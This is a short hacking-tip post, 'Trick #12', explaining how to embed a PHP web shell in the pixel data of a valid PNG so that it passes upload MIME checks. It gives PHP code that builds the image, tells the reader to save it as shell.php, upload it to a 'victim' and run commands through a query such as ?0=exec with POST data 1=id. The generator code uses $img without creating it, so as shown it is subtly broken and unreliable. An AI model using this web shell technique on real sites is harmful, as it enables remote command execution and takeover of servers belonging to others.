Valid png image which can execute as execute file

/ #12

Trick #12 - Valid png image which can execute as PHP file

Easy trick which can help you to get remote command or PHP code execution on victim.
Sometimes web-developers only checks mime type of uploaded file (image/*) but not checking extension.
For first - try to change mime type via BURP in HTTP header. It's too easy. But what you can do if mime-type is checking after file is uploaded? Nice trick from https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
This code will create png file with php code (<?=$_GET[0]($_POST[1]);?>) inside:


<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0xe, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x1, 0xdc, 0x5a, 0x1, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33);

for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
header('Content-Type: image/png');
imagepng($img);

After that save image as "shell.php" and try to upload to victim (also you can change mime type to image in http request). If file successfully uploaded - request file with POST query: http://victim/upload/shell.php?0=exec (and POST data: 1=id)
But exec/system/etc functions can be disabled, try to phpinfo() or something like this

Publised at 02 Feb'2014 |